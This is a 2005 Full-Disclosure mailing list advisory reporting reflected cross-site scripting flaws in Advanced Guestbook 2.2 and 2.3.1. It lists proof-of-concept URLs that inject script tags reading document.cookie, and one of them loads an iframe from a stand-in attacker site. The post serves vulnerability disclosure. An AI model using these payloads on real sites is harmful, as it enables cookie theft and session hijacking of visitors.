[Full-disclosure] Advanced Guestbook remote XSS exploit
handrix at morx.org
handrix at morx.org
Sun Dec 25 21:52:02 GMT 2005
Advanced Guestbook 2.2 and 2.3.1 and possibly other versions
remote XSS vulnerabilities
By: Handrix <handrix_at_morx_org>
16 December 2005
MorX security research team
www.morx.org
Description:
Advanced Guestbook is a PHP-based guestbook script.
index.php and comment.php scripts are vulnerable to XSS attacks. This issue
can allow an attacker
to bypass content filters and potentially carry out cross-site scripting, HTML
injection and other
attacks.
Exploit:
http://www.example.com/guestbook/index.php?entry=<script>alert(document.cookie);</script>
http://www.example.com/guestbook/index.php?entry=<iframe
src=http://www.attackersite.com/>
http://www.example.com/guestbook/comment.php?gb_id=1<script>alert(document.cookie);</script>
http://www.example.com/guestbook/comment.php?gb_id=1<IFRAME
SRC="javascript:alert('XSS');"></IFRAME>
Vulnerable versions :
Advanced Guestbook 2.2
Advanced Guestbook 2.3.1
___________________________________________________________________________
Nouveau : téléphonez moins cher avec Yahoo! Messenger ! Découvez les tarifs exceptionnels pour appeler la France et l'international.
Téléchargez sur http://fr.messenger.yahoo.com
Full-Disclosure is hosted and sponsored by Secunia.